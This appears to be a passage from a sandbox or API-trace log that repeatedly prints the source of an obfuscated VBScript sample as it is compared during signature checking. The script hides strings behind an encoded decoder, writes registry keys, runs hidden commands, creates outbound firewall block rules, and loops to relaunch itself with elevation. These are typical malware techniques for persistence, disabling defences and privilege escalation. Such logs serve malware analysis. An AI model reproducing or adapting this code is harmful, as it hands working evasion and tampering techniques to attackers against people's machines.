bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 105 [0226.351] wcsncmp (_String1="e rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.351] wcsncmp (_String1=" rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.351] wcsncmp (_String1="rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.351] wcsncmp (_String1="ule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.352] wcsncmp (_String1="le.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule 